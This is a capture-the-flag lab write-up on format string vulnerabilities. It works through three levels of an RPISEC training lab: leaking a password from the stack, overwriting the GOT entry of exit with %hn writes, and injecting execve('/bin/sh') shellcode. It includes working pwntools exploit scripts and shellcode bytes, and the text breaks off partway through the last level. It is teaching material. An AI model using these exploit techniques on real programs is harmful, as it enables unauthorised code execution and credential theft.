In the last lab, which writeup can be found here, we used publicly available shellcodes as well as shellcodes we had to write on our own, in order to exploit the provided binaries. In this writeup we proceed with the next lab, which focuses on the subject of Format Strings.
As usual there are three levels ranging from C to A:
–> lab4C
–> lab4B
–> lab4A
lab4C
We start by connecting to the first level of lab04 using the credentials lab4C with the password lab04start:
gameadmin@warzone:~$ sudo ssh lab4C@localhost lab4C@localhost's password: (lab04start) ____________________.___ _____________________________ \______ \______ \ |/ _____/\_ _____/\_ ___ \ | _/| ___/ |\_____ \ | __)_ / \ \/ | | \| | | |/ \ | \\ \____ |____|_ /|____| |___/_______ //_______ / \______ / \/ \/ \/ \/ __ __ _____ ____________________________ _______ ___________ / \ / \/ _ \\______ \____ /\_____ \ \ \ \_ _____/ \ \/\/ / /_\ \| _/ / / / | \ / | \ | __)_ \ / | \ | \/ /_ / | \/ | \| \ \__/\ /\____|__ /____|_ /_______ \\_______ /\____|__ /_______ / \/ \/ \/ \/ \/ \/ \/ -------------------------------------------------------- Challenges are in /levels Passwords are in /home/lab*/.pass You can create files or work directories in /tmp -----------------[ contact@rpis.ec ]----------------- Last login: Sat Jan 27 06:07:38 2018 from localhost
Like in the last labs we have access to the source code of each level:
lab4C@warzone:/levels/lab04$ cat lab4C.c /* * Format String Lab - C Problem * gcc -z execstack -z norelro -fno-stack-protector -o lab4C lab4C.c */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #define PASS_LEN 30 int main(int argc, char *argv[]) { char username[100] = {0}; char real_pass[PASS_LEN] = {0}; char in_pass[100] = {0}; FILE *pass_file = NULL; int rsize = 0; /* open the password file */ pass_file = fopen("/home/lab4B/.pass", "r"); if (pass_file == NULL) { fprintf(stderr, "ERROR: failed to open password file\n"); exit(EXIT_FAILURE); } /* read the contents of the password file */ rsize = fread(real_pass, 1, PASS_LEN, pass_file); real_pass[strcspn(real_pass, "\n")] = '\0'; // strip \n if (rsize != PASS_LEN) { fprintf(stderr, "ERROR: failed to read password file\n"); exit(EXIT_FAILURE); } /* close the password file */ fclose(pass_file); puts("===== [ Secure Access System v1.0 ] ====="); puts("-----------------------------------------"); puts("- You must login to access this system. -"); puts("-----------------------------------------"); /* read username securely */ printf("--[ Username: "); fgets(username, 100, stdin); username[strcspn(username, "\n")] = '\0'; // strip \n /* read input password securely */ printf("--[ Password: "); fgets(in_pass, sizeof(in_pass), stdin); in_pass[strcspn(in_pass, "\n")] = '\0'; // strip \n puts("-----------------------------------------"); /* log the user in if the password is correct */ if(!strncmp(real_pass, in_pass, PASS_LEN)){ printf("Greetings, %s!\n", username); system("/bin/sh"); } else { printf(username); printf(" does not have access!\n"); exit(EXIT_FAILURE); } return EXIT_SUCCESS; }
What does the program do?
–> The file /home/lab4B/.pass
is opened (line 22).
–> It’s contents are stored in a buffer called real_pass
(line 29).
–> The user can input a username (lines 45-47) and a password (lines 50-52).
–> If the password matches the real password (line 57), a shell is spawned (line 59).
–> If the password does not match, printf
is called with username
(line 61).
As we already know because of the lab’s subject we are looking for some kind of format string vulnerability. A lot of c-functions (for example printf
, fprintf
and snprintf
) use format strings. The count of arguments passed to those functions is variable:
char username[] = "admin"; int id = 1337; printf("hello %s, your id is: %d\n", username, id);
In the example above, three arguments are passed to the function:
- The format string:
"hello %s, your id is: %d\n"
- A string:
username
- An integer:
id
The function printf
simply processes the format string looking for format specifiers. When a format specifier is found, it takes the first element following the format string on the stack and inserts this element in the format string according to the chosen format specifier. When the next format specifier is found, the second element from the stack is inserted:
lab4C@warzone:/tmp$ ./example hello admin, your id is: 1337
If there would be another format specifier within the format string, the function would simply take the next element on the stack:
When we can control the format string, we can insert format specifiers which will leak elements stored on the stack.
In the code above on line 61 printf
is called with the first argument (the format string) being a string the user provided (username
). Thus we can use the username to leak items on the stack:
lab4C@warzone:/levels/lab04$ ./lab4C ===== [ Secure Access System v1.0 ] ===== ----------------------------------------- - You must login to access this system. - ----------------------------------------- --[ Username: test%d --[ Password: test ----------------------------------------- test-1073744446 does not have access! lab4C@warzone:/levels/lab04$
After entering test%d
printf
expects the next item on the stack to be an integer and inserts it into the string: test-1073744446
.
As we already know, the password we are looking for is kindly stored in a local variable on the stack (real_pass
). Thus we only need to leak enough items from the stack until the password is read.
Very hand for this task is the argument selector $
. With $
the argument to be printed can be selected by its location on the stack:
#include <stdio.h> int main() { char c1 = 'A'; char c2 = 'B'; char c3 = 'C'; printf("%2$c %3$c %1$c\n", c1, c2, c3); return 0; }
Running this example will print B
, C
, A
instead of A
, B
, C
:
lab4C@warzone:/levels/lab04$ ./example2 B C A
Because the local variable username
is limited to 100 bytes we can write a python-script which iterates over all items on the stack running the program multiple times:
lab4C@warzone:/levels/lab04$ cat /tmp/exploit_lab4C.py from pwn import * for i in range(1, 40, 10): p = process("./lab4C") line = "" for j in range(10): line += "%"+str(i+j)+"$08x " p.sendline(line) p.sendline("pass") print(p.recv(2000))
The script runs the program 4 times, passing an format string (line 8, line 10) which prints 10 items on the stack each time. The format specifier %n$08x
prints the n-th item on the stack as an hex-value (x
) padded with leading zeros to fit 8 characters (08
):
lab4C@warzone:/levels/lab04$ python /tmp/exploit_lab4C.py [+] Starting program './lab4C': Done [*] Program './lab4C' stopped with exit code 1 ===== [ Secure Access System v1.0 ] ===== ----------------------------------------- - You must login to access this system. - ----------------------------------------- --[ Username: --[ Password: ----------------------------------------- bffff5c2 0000001e 0804a008 61700000 00007373 00000000 00000000 00000000 00000000 00000000 does not have access! [+] Starting program './lab4C': Done [*] Program './lab4C' stopped with exit code 1 ===== [ Secure Access System v1.0 ] ===== ----------------------------------------- - You must login to access this system. - ----------------------------------------- --[ Username: --[ Password: ----------------------------------------- 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 does not have access! [+] Starting program './lab4C': Done [*] Program './lab4C' stopped with exit code 1 ===== [ Secure Access System v1.0 ] ===== ----------------------------------------- - You must login to access this system. - ----------------------------------------- --[ Username: --[ Password: ----------------------------------------- 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 75620000 74315f37 does not have access! [+] Starting program './lab4C': Done [*] Program './lab4C' stopped with exit code 1 ===== [ Secure Access System v1.0 ] ===== ----------------------------------------- - You must login to access this system. - ----------------------------------------- --[ Username: --[ Password: ----------------------------------------- 7334775f 625f376e 33745572 7230665f 62343363 00216531 24313325 20783830 24323325 20783830 does not have access!
We only need to extract the password from the local variable real_pass
now. The output from the last two calls looks like ASCII:
00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 75620000 74315f37 does not have access! 7334775f 625f376e 33745572 7230665f 62343363 00216531 24313325 20783830 24323325 20783830 does not have access!
In the second line there is a null-byte terminating the string. The following python-script contains the concatenated bytes and converts these bytes from little endian to the final string:
lab4C@warzone:/levels/lab04$ cat /tmp/convertPwd_lab4C.py pwd_le = "7562000074315f377334775f625f376e337455727230665f6234336300216531" pwd = "" for i in range(0, len(pwd_le), 8): # the 4 byte values are stored in little endian pwd += pwd_le[i+6:i+8] + pwd_le[i+4:i+6] + pwd_le[i+2:i+4] + pwd_le[i:i+2] print(pwd) print(pwd.decode("hex"))
Running the script yields the password:
lab4C@warzone:/levels/lab04$ python /tmp/create_lab4C.py 00006275375f31745f7734736e375f62725574335f6630726333346231652100 bu7_1t_w4sn7_brUt3_f0rc34b1e!
Done π The password for the next level is bu7_1t_w4sn7_brUt3_f0rc34b1e!
.
We could use these credentials as the password input for the program in order to get a shell, but the password is all we need for now π
lab4B
We connecting to the next level using the previously gained credentials lab4B with the password bu7_1t_w4sn7_brUt3_f0rc34b1e!:
gameadmin@warzone:~$ sudo ssh lab4B@localhost lab4B@localhost's password: (bu7_1t_w4sn7_brUt3_f0rc34b1e!) ____________________.___ _____________________________ \______ \______ \ |/ _____/\_ _____/\_ ___ \ | _/| ___/ |\_____ \ | __)_ / \ \/ | | \| | | |/ \ | \\ \____ |____|_ /|____| |___/_______ //_______ / \______ / \/ \/ \/ \/ __ __ _____ ____________________________ _______ ___________ / \ / \/ _ \\______ \____ /\_____ \ \ \ \_ _____/ \ \/\/ / /_\ \| _/ / / / | \ / | \ | __)_ \ / | \ | \/ /_ / | \/ | \| \ \__/\ /\____|__ /____|_ /_______ \\_______ /\____|__ /_______ / \/ \/ \/ \/ \/ \/ \/ -------------------------------------------------------- Challenges are in /levels Passwords are in /home/lab*/.pass You can create files or work directories in /tmp -----------------[ contact@rpis.ec ]----------------- Last login: Sun Jan 21 15:08:34 2018 from localhost
And start analysing the provided source code:
lab4B@warzone:/levels/lab04$ cat lab4B.c /* * Format String Lab - B Problem * gcc -z execstack -z norelro -fno-stack-protector -o lab4B lab4B.c */ #include <stdio.h> #include <stdlib.h> #include <string.h> int main(int argc, char *argv[]) { int i = 0; char buf[100]; /* read user input securely */ fgets(buf, 100, stdin); /* convert string to lowercase */ for (i = 0; i < strlen(buf); i++) if (buf[i] >= 'A' && buf[i] <= 'Z') buf[i] = buf[i] ^ 0x20; /* print out our nice and new lowercase string */ printf(buf); exit(EXIT_SUCCESS); return EXIT_FAILURE; }
What does the program do?
–> On line 15 fgets
is called, reading 100 bytes into a local variable called buf
.
–> In the for-loop on lines 18-20 all upper-case characters are converted to lower-case.
–> The adjusted user input is printed using printf
(line 23).
As well as in the last level we control a string which is passed as a format string to printf
. This time the string is converted to lower-case before being passed to printf
, but that should not do too much harm. The main difference compared to the last level is that the password we are looking for is unfortunately not stored in a local variable on the stack. Thus we cannot just leak the password.
In order to exploit the program another handy feature of format strings come into play: the format specifier %n
. When placed in a format string %n
will put the number of bytes printed so far in the variable passed as an argument on the stack:
#include <stdio.h> int main() { unsigned int len = 0; printf("testing with%n n-specifier\n", &len); printf("bytes printed by last printf so far: %d\n", len); return 0; }
Running the example:
lab4B@warzone:/tmp$ ./example testing with n-specifier bytes printed by last printf so far: 12
As we can see, the value 12
is written to the local variable len
. 12
is the amount of characters being printed before the %n
specifier: len("testing with") = 12
.
This format specifier can be abused to write arbitrary data to an arbitrary address! We will get to this later.
At first we need to know where on the stack the buffer we can write to (buf
) is located. This can be done by putting a pattern into the buffer, followed by a few format specifiers which leaks the stack:
lab4B@warzone:/levels/lab04$ ./lab4B aaaa.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x aaaa.00000064.b7fcdc20.00000000.bffff704.bffff678.61616161.3830252e.30252e78.252e7838
The input begins with aaaa
which equals 61616161
in hex. As we can see, the 6th item on the stack is the beginning of our buffer. We can verify this by using the argument selector:
lab4B@warzone:/levels/lab04$ ./lab4B aaaa.%6$08x aaaa.61616161
Thus the arguments on the stack looks like this when printf
is entered:
As the stack is executable and we control a long enough buffer (100 byte), we can store a shellcode in this buffer. In lab03 we executed our shellcode by overwriting the return address on the stack. Reconsider the last lines of the source code:
exit(EXIT_SUCCESS); return EXIT_FAILURE; }
Before the main
function returns exit
is called. This will directly terminate the program and the return
instruction never gets reached. Thus our shellcode gets not executed if we overwrite the return address. We have to write the address of our shellcode somewhere else.
In this case we can use the function call to exit
in order to redirect the control flow. We do not want to get in the details for now. All you need to know is that function calls are made through the Procedure Linkage Table (PLT), which references the Global Offset Table (GOT):
[0x08048590]> pdf @ main β (fcn) sym.main 276 β ; DATA XREF from 0x080485a7 (entry0) β ;-- main: β ;-- sym.main: β 0x0804868d 55 push ebp β 0x0804868e 89e5 mov ebp, esp ... β 0x08048729 c70424000000. mov dword [esp], 0 β 0x08048730 e82bfeffff call sym.imp.exit ;sym.imp.exit() ... [0x080486a4]> pdf @ sym.imp.exit β (fcn) sym.imp.exit 6 β ; CALL XREF from 0x08048730 (sym.main) β ;-- sym.imp.exit: β 0x08048560 ff25b8990408 jmp dword [reloc.exit_184] ; "f...v......." @ 0x80499b8 [0x080486a4]>
As we can see in the output above, exit
is called with the symbol sym.imp.exit
(0x08048560
). This address is the exit
entry within the PLT and contains a jump to the address stored at reloc.exit_184
, which is the GOT entry of exit
. This means that, when exit
is called, the execution will proceed at the address stored at reloc.exit_184
(0x80499b8
).
If we write the address of our shellcode to that address, our shellcode will be executed when the function exit
is called.
Summing it up we need to the following:
–> Store a shellcode in the buffer.
–> Abuse the %n
specifier to write the address of our shellcode to the GOT entry of exit
.
shellcode
Basically we can reuse the shellcode from lab03 which makes a sys_execve
syscall passing /bin/sh
as argument.
One point we have to consider is that the string we enter is converted to lower-case before being passed to printf
. Thus our shellcode cannot contain bytes between 0x41
(A
) and 0x5A
(Z
). So we have to adjust the shellcode we used a little bit:
31 c0 xor eax, eax ;50 push eax 83 ec 04 sub esp, 0x4 89 04 24 mov [esp], eax 68 2f 2f 73 68 push 0x68732f2f 68 2f 62 69 6e push 0x6e69622f 89 e3 mov ebx, esp 89 c1 mov ecx, eax 89 c2 mov edx, eax b0 0b mov al, 0xb cd 80 int 0x80 31 c0 xor eax, eax 40 inc eax cd 80 int 0x80
The instruction push eax
(0x50
) would be converted to lower-case and thus be destroyed. As there are plenty ways of doing things on x86 we can simply replace this instruction with two new instructions: sub esp, 0x4
and mov [esp], eax
. This will do the same as push eax
.
%n specifier
As I have already mentioned, the %n
specifier can be used to write arbitrary data to an arbitrary address. We will now see how this works and use this to write the address of our shellcode in the GOT entry of exit
.
In the example earlier in this writeup, we have seen that %n
expects an address to an unsigned integer and writes the count of characters printed so far to this address. As we have also seen, we can use the argument selector $
to select a specific argument. If the string we entered contains the address, we want to write to, we can simply select this address with argument selector $
and write the count of printed characters so far with the %n
specifier.
So for now we can write to an arbitrary address. But how do we control what value we write? Since the count of characters printed are written, we must simply print as much characters as our value should be. This can be done easily by using the padding mechanism of a format string, we already used: the format specifier %8x
pads the value to 8 characters. If we use %1000x
the value is padded to 1000 characters.
We already determined the address where we want to write to (the GOT entry of exit
): 0x80499b8
.
We still need the address of our shellcode (the address of buf
on the stack):
lab4B@warzone:/levels/lab04$ gdb lab4B Reading symbols from lab4B...(no debugging symbols found)...done. gdb-peda$ disassemble main Dump of assembler code for function main: 0x0804868d <+0>: push ebp 0x0804868e <+1>: mov ebp,esp 0x08048690 <+3>: push ebx ... 0x080486b0 <+35>: lea eax,[esp+0x18] 0x080486b4 <+39>: mov DWORD PTR [esp],eax 0x080486b7 <+42>: call 0x8048540 <fgets@plt> ... 0x08048729 <+156>: mov DWORD PTR [esp],0x0 0x08048730 <+163>: call 0x8048560 <exit@plt> End of assembler dump. gdb-peda$ b *main+42 Breakpoint 1 at 0x80486b7
As the buffer buf
is passed as an argument to fgets
we simply set a breakpoint before the call and inspect the stack when the breakpoint is hit:
gdb-peda$ r Starting program: /levels/lab04/lab4B [----------------------------------registers-----------------------------------] EAX: 0xbffff6a8 --> 0xbffff6c0 --> 0xffffffff EBX: 0xb7fcd000 --> 0x1a9da8 ECX: 0x859c4868 EDX: 0xbffff744 --> 0xb7fcd000 --> 0x1a9da8 ESI: 0x0 EDI: 0x0 EBP: 0xbffff718 --> 0x0 ESP: 0xbffff690 --> 0xbffff6a8 --> 0xbffff6c0 --> 0xffffffff EIP: 0x80486b7 (<main+42>: call 0x8048540 <fgets@plt>) EFLAGS: 0x287 (CARRY PARITY adjust zero SIGN trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x80486a8 <main+27>: mov DWORD PTR [esp+0x4],0x64 0x80486b0 <main+35>: lea eax,[esp+0x18] 0x80486b4 <main+39>: mov DWORD PTR [esp],eax => 0x80486b7 <main+42>: call 0x8048540 <fgets@plt> 0x80486bc <main+47>: mov DWORD PTR [esp+0x7c],0x0 0x80486c4 <main+55>: jmp 0x8048709 <main+124> 0x80486c6 <main+57>: lea edx,[esp+0x18] 0x80486ca <main+61>: mov eax,DWORD PTR [esp+0x7c] Guessed arguments: arg[0]: 0xbffff6a8 --> 0xbffff6c0 --> 0xffffffff arg[1]: 0x64 ('d') arg[2]: 0xb7fcdc20 --> 0xfbad2088 [------------------------------------stack-------------------------------------] 0000| 0xbffff690 --> 0xbffff6a8 --> 0xbffff6c0 --> 0xffffffff 0004| 0xbffff694 --> 0x64 ('d') 0008| 0xbffff698 --> 0xb7fcdc20 --> 0xfbad2088 0012| 0xbffff69c --> 0x0 0016| 0xbffff6a0 --> 0xbffff754 --> 0xbde68c78 0020| 0xbffff6a4 --> 0xbffff6c8 --> 0xb7e2fbf8 --> 0x2aa0 0024| 0xbffff6a8 --> 0xbffff6c0 --> 0xffffffff 0028| 0xbffff6ac --> 0x80483a9 ("__libc_start_main") [------------------------------------------------------------------------------] Legend: code, data, rodata, value Breakpoint 1, 0x080486b7 in main () gdb-peda$
The address 0xbffff6a8
is on top of the stack. This will be the address where we store our shellcode. Nevertheless we must remember that this address may vary when directly running the binary without gdb
.
Finally we can write a python-script which will create the input to the program:
lab4B@warzone:/levels/lab04$ cat /tmp/exploit_lab4B.py import sys from pwn import * shellcode = "\x31\xc0"\ "\x83\xec\x04"\ "\x89\x04\x24"\ "\x68\x2f\x2f\x73\x68"\ "\x68\x2f\x62\x69\x6e"\ "\x89\xe3"\ "\x89\xc1"\ "\x89\xc2"\ "\xb0\x0b"\ "\xcd\x80"\ # len = 28 exit_got = 0x080499b8 addr_buf = int(sys.argv[1], 16) # gdb: 0xbffff6a8 value_u2 = addr_buf >> 16 value_l2 = addr_buf & 0xffff expl = shellcode expl += p32(exit_got+2) # upper bytes at higher address --> little endian! expl += p32(exit_got) expl += "%" + str(value_u2 - 28 - 8) + "x" expl += "%13$hn" expl += "%" + str(value_l2 - value_u2) + "x" expl += "%14$hn" sys.stdout.write(expl+"\n")
The following picture illustrates, how printf
evaluates the string provided by the python-script:
The first 28 bytes of the user input is the shellcode we adjusted to overcome the lower-case conversion. The next 4 bytes are the address of the GOT entry of exit
+2
, followed by another 4 bytes which are the exact address of exit
‘s GOT entry. This is done because we do not write all 8 bytes of our shellcode address at once, but 4 bytes at a time. This way we can limit the amount of characters we need to print. The only difference between the format specifier %hn
and %n
is that %hn
expects an unsigned short (2 bytes) instead of an unsigned integer (4 bytes).
One important aspect is that we need to write the lower of both value first, because we can easily print more characters after the first value but not less.
Summing it up printf
will:
–> Print the first 36 static characters (our shellcode + the 2 addresses).
–> Print the first element on the stack padded to 49115 characters.
–> Write the amount of characters printed so far (36+49115 = 49151 = 0xbfff
) to address exit_got+2
.
–> Print the second element on the stack padded to 13913 characters.
–> Write the amount of characters printed so far (49151+13913 = 63064 = 0xf658
) to address exit_got
.
As you may have noticed, I have already changed the address of our shellcode from 0xbffff6a8
to 0xbffff658
since the address determined using gdb
varies a little bit from the address when directly executing the binary. In order to quickly test a few addresses, I have defined the shellcode address as an argument to the python script.
Now we only need to create the final input to the program:
lab4B@warzone:/levels/lab04$ python /tmp/exploit_lab4B.py 0xbffff658 > /tmp/out
And run the binary with that input:
lab4B@warzone:/levels/lab04$ (cat /tmp/out; cat) | ./lab4B 1βββ$h//shh/binβββΒ° Νββ 64 b7fcdc20 whoami lab4A cat /home/lab4A/.pass fg3ts_d0e5n7_m4k3_y0u_1nv1nc1bl3
Done π The password is fg3ts_d0e5n7_m4k3_y0u_1nv1nc1bl3
.
lab4A
We connect to the last level of lab04 using the credentials lab4A with the password fg3ts_d0e5n7_m4k3_y0u_1nv1nc1bl3:
gameadmin@warzone:~$ sudo ssh lab4A@localhost lab4A@localhost's password: (fg3ts_d0e5n7_m4k3_y0u_1nv1nc1bl3) ____________________.___ _____________________________ \______ \______ \ |/ _____/\_ _____/\_ ___ \ | _/| ___/ |\_____ \ | __)_ / \ \/ | | \| | | |/ \ | \\ \____ |____|_ /|____| |___/_______ //_______ / \______ / \/ \/ \/ \/ __ __ _____ ____________________________ _______ ___________ / \ / \/ _ \\______ \____ /\_____ \ \ \ \_ _____/ \ \/\/ / /_\ \| _/ / / / | \ / | \ | __)_ \ / | \ | \/ /_ / | \/ | \| \ \__/\ /\____|__ /____|_ /_______ \\_______ /\____|__ /_______ / \/ \/ \/ \/ \/ \/ \/ -------------------------------------------------------- Challenges are in /levels Passwords are in /home/lab*/.pass You can create files or work directories in /tmp -----------------[ contact@rpis.ec ]----------------- Last login: Mon Jan 22 03:50:48 2018 from localhost
As always we start by analysing the source code:
lab4A@warzone:/levels/lab04$ cat lab4A.c /* * Format String Lab - A Problem * gcc -z execstack -z relro -z now -o lab4A lab4A.c */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <unistd.h> #define BACKUP_DIR "./backups/" #define LOG_FILE "./backups/.log" void log_wrapper(FILE *logf, char *msg, char *filename) { char log_buf[255]; strcpy(log_buf, msg); snprintf(log_buf+strlen(log_buf), 255-strlen(log_buf)-1/*NULL*/, filename); log_buf[strcspn(log_buf, "\n")] = '\0'; fprintf(logf, "LOG: %s\n", log_buf); } int main(int argc, char *argv[]) { char ch = EOF; char dest_buf[100]; FILE *source, *logf; int target = -1; if (argc != 2) { printf("Usage: %s filename\n", argv[0]); } // Open log file logf = fopen(LOG_FILE, "w"); if (logf == NULL) { printf("ERROR: Failed to open %s\n", LOG_FILE); exit(EXIT_FAILURE); } log_wrapper(logf, "Starting back up: ", argv[1]); // Open source source = fopen(argv[1], "r"); if (source == NULL) { printf("ERROR: Failed to open %s\n", argv[1]); exit(EXIT_FAILURE); } // Open dest strcpy(dest_buf, BACKUP_DIR); strncat(dest_buf, argv[1], 100-strlen(dest_buf)-1/*NULL*/); target = open(dest_buf, O_CREAT | O_EXCL | O_WRONLY, S_IRUSR | S_IWUSR); if (target < 0) { printf("ERROR: Failed to open %s%s\n", BACKUP_DIR, argv[1]); exit(EXIT_FAILURE); } // Copy data while( ( ch = fgetc(source) ) != EOF) write(target, &ch, 1); log_wrapper(logf, "Finished back up ", argv[1]); // Clean up fclose(source); close(target); return EXIT_SUCCESS; }
What does the program do?
–> The program is supposed to be run with one argument (line 34-35).
–> A logfile is opened, which is passed to the function log_wrapper
(line 39, 45).
–> The argument passed to the program is interpreted as a filename (line 48).
–> The given file is copied byte-by-byte to the folder ./backups/
(line 64-65).
–> The function log_wrapper
copies the given message (msg
) in a temporary buffer (log_buf
) (line 20).
–> The filename, taken from the passed argument to the program, is appended to that buffer using snprintf
(line 21).
–> The temporary buffer (log_buf
) is written to the logfile (line 23).
Where is a vulnerability within the program?
Since the source code is a little bit larger, it is not as obvious as in the last level. Yet again we are dealing with format string vulnerabilities. This time it is not about printf
but snprintf
. On line 21 snprintf
is called with the third argument being the format string. This is the filename the user provided when running the program. That means that the format string is user controlled and we can use the exploiting techniques described in the last two levels.
One may think that snprintf
is more secure than printf
since there is a size-parameter (second argument), but this only sets the maximum amount of characters to write into the provided buffer (first argument). One may also think that this prevents the %n
specifier technique since we can only write a limited amount of characters. But that is not completely true. Indeed we can not write more bytes to the provided buffer, but the %n
specifier will not be evaluated to the bytes actual written but to the characters that should have been written! Despite of the length limit of the buffer we can still use the %n
specifier to write arbitrary data to an arbitrary address.
In the last level we have overwritten an entry in the Global Offset Table (GOT) in order to redirect the control flow. This time we cannot do that, because the binary is compiled with Full RELRO
:
lab4A@warzone:/levels/lab04$ checksec lab4A RELRO STACK CANARY NX PIE RPATH RUNPATH FORTIFY FORTIFIED FORTIFY-able FILE Full RELRO Canary found NX disabled No PIE No RPATH No RUNPATH Yes 0 10 lab4A
With Full RELRO
enabled the entire GOT is remapped as read-only. Thus we cannot alter any values there. Also a STACK CANARY
has been found. A stack canary is a random value which is placed on the stack on every function call. When leaving a function, it is verified that the values has not been altered. If the value has changed, the program terminates. When we try to overwrite the return address in a simple buffer overflow the stack canary gets overwritten because all bytes from the beginning of the buffer up to the final return address have to be filled. Since we have identified a format string vulnerability we can write to a specific unique address without harming the stack canary. That is why a stack canary will not prevent us from overwriting the return address on the stack. That is what we are going to do here.
As we have figured out how to control the instruction pointer, we have to decide where we point it to. Fortunately NX
is still disabled. This means that we can store a shellcode on the stack and execute it.
What are we going to do?
–> Determine the argument selector for the buffer we can write to (log_buf + offset for strlen(msg)
).
–> Determine the address of the buffer in order to overwrite the return address for the function log_wrapper
correspondingly.
–> Determine the address where the return address is stored.
–> Store a shellcode in the buffer and use the %n
specifier to overwrite the return address with the address of the buffer (shellcode).
argument selector
In order to run the program there must be a backups
folder in the current directory:
lab4A@warzone:/levels/lab04$ ./lab4A test ERROR: Failed to open ./backups/.log lab4A@warzone:/levels/lab04$ mkdir backups mkdir: cannot create directory βbackupsβ: Permission denied
We cannot create a directory in /levels/lab04
and must run the program for example from /tmp
:
lab4A@warzone:/levels/lab04$ cd /tmp lab4A@warzone:/tmp$ mkdir backups lab4A@warzone:/tmp$ /levels/lab04/lab4A test ERROR: Failed to open test
The program prints an error because there is no file called test
in the current directory, but now there is no error that the file ./backups/.log
cannot be opened. This suffices since the function log_wrapper
already gets called (see line 45 source code) and adds a log entry:
lab4A@warzone:/tmp$ cd backups lab4A@warzone:/tmp/backups$ cat .log LOG: Starting back up: test
Now we run the program with a filename containing a 4 byte pattern and multiple format specifiers to leak the stack:
lab4A@warzone:/tmp$ /levels/lab04/lab4A AAAA.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x ERROR: Failed to open AAAA.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x lab4A@warzone:/tmp$ cat backups/.log LOG: Starting back up: AAAA.b7e9eb73.b7e9548c.bffff842. 8048cda. 804b008. 0. 0.b7e24994.617453c8.6e697472.61622067.75206b63.41203a70.2e414141.39653762.33376265
The 14th element contains our pattern. But only 3 bytes from it (2e414141
). The 4th byte is within the 13th element: 41203a70
.
That means that we have to add 1 byte at the beginning of the buffer in order to align the characters to the 4 byte chunks on the stack.
We can verify this using the argument selector (do not forget to escape the $
on the bash):
lab4A@warzone:/tmp$ /levels/lab04/lab4A XAAAA.%14\$08x ERROR: Failed to open XAAAA.%14$08x lab4A@warzone:/tmp$ cat backups/.log LOG: Starting back up: XAAAA.41414141
The additional X
at the beginning of the filename aligns the characters to the 4 byte chunks on the stack.
address of buffer and return address
In order to determine the address of the buffer and the return address we use gdb
keeping in mind that these addresses may vary:
lab4A@warzone:/tmp$ gdb /levels/lab04/lab4A Reading symbols from /levels/lab04/lab4A...(no debugging symbols found)...done. gdb-peda$ disassemble log_wrapper Dump of assembler code for function log_wrapper: 0x080488fd <+0>: push ebp 0x080488fe <+1>: mov ebp,esp 0x08048900 <+3>: push ebx ... 0x08048972 <+117>: mov eax,DWORD PTR [ebp-0x124] 0x08048978 <+123>: mov DWORD PTR [esp+0x8],eax 0x0804897c <+127>: mov DWORD PTR [esp+0x4],ebx 0x08048980 <+131>: mov DWORD PTR [esp],edx 0x08048983 <+134>: call 0x80487c0 <snprintf@plt> ... 0x080489dd <+224>: pop ebx 0x080489de <+225>: pop ebp 0x080489df <+226>: ret End of assembler dump.
The locations we are interested in are the call to snprintf
and the ret
instruction within the function log_wrapper
. We set a breakpoint on each address:
gdb-peda$ b *log_wrapper+134 Breakpoint 1 at 0x8048983 gdb-peda$ b *log_wrapper+226 Breakpoint 2 at 0x80489df
And run the program:
gdb-peda$ r test Starting program: /levels/lab04/lab4A test [----------------------------------registers-----------------------------------] EAX: 0xbffff8eb ("test") EBX: 0xec ECX: 0x1d EDX: 0xbffff56f --> 0x4b00800 ESI: 0x0 EDI: 0x0 EBP: 0xbffff668 --> 0xbffff708 --> 0x0 ESP: 0xbffff530 --> 0xbffff56f --> 0x4b00800 EIP: 0x8048983 (<log_wrapper+134>: call 0x80487c0 <snprintf@plt>) EFLAGS: 0x286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x8048978 <log_wrapper+123>: mov DWORD PTR [esp+0x8],eax 0x804897c <log_wrapper+127>: mov DWORD PTR [esp+0x4],ebx 0x8048980 <log_wrapper+131>: mov DWORD PTR [esp],edx => 0x8048983 <log_wrapper+134>: call 0x80487c0 <snprintf@plt> 0x8048988 <log_wrapper+139>: mov DWORD PTR [esp+0x4],0x8048c90 0x8048990 <log_wrapper+147>: lea eax,[ebp-0x10b] 0x8048996 <log_wrapper+153>: mov DWORD PTR [esp],eax 0x8048999 <log_wrapper+156>: call 0x8048700 <strcspn@plt> Guessed arguments: arg[0]: 0xbffff56f --> 0x4b00800 arg[1]: 0xec arg[2]: 0xbffff8eb ("test") [------------------------------------stack-------------------------------------] 0000| 0xbffff530 --> 0xbffff56f --> 0x4b00800 0004| 0xbffff534 --> 0xec 0008| 0xbffff538 --> 0xbffff8eb ("test") 0012| 0xbffff53c --> 0xb7e9eb73 (<__GI_strstr+19>: add ebx,0x12e48d) 0016| 0xbffff540 --> 0xb7e9548c (<malloc_init_state+12>: add ebx,0x137b74) 0020| 0xbffff544 --> 0xbffff8eb ("test") 0024| 0xbffff548 --> 0x8048cda ("Starting back up: ") 0028| 0xbffff54c --> 0x804b008 --> 0xfbad2484 [------------------------------------------------------------------------------] Legend: code, data, rodata, value Breakpoint 1, 0x08048983 in log_wrapper () gdb-peda$
The first breakpoint is hit. We are right before the call to snprintf
. The address of the buffer is on the top of the stack: 0xbffff56f
.
Let’s continue to the ret
instruction:
